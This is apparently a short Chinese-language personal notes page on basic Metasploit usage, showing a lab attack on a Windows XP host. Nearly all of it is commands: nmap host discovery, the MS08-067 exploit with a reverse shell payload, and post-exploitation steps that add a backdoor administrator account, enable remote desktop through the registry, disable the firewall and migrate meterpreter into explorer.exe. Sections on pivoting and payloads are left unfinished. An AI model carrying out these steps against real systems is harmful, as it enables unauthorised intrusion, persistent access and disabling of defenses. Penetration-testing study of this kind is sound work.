Msf 基本用法

 

 

 

Msf 基本用法

 

 

Msfconsole

Help

 

nmap -sn 192.168.208.0/24    主機發現

 

滲透攻擊過程   需要xp用戶登錄系統後纔可以利用成功。
 1.search MS08-067
 2. use  exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi  
 3. show payloads
 4. set payload  generic/shell_reverse_tcp
 5. show targets
 6. show options
 7. set RHOST 192.168.208.166
 8. set LHOST 192.168.1.36
 9. exploit

 

 

提權過程

>net user lilei 123456 /add --添加用戶
>net localgroup administrators lilei /add --將lilei添加到administrators用戶組
>netstat -na --查看開放端口
>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f --打開遠程桌面3389端口
>netsh firewall set opmode disable --關閉防火牆

 

 

 

meterpreter

 

Ps

 

 

netstat -ano |findstr 4444  可以查出  meterpreter 建立的host 進程。 比如爲984

Migrate   移到 explore.exe 進程後, 即使host 殺死984進程, host 中仍然可以通過netstat -ano |findstr 4444  看到 ,猜測此時的984 已經不是進程號而是線程號了。

 

跳板攻擊:  待續

Payload : 待續

 

 

 

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章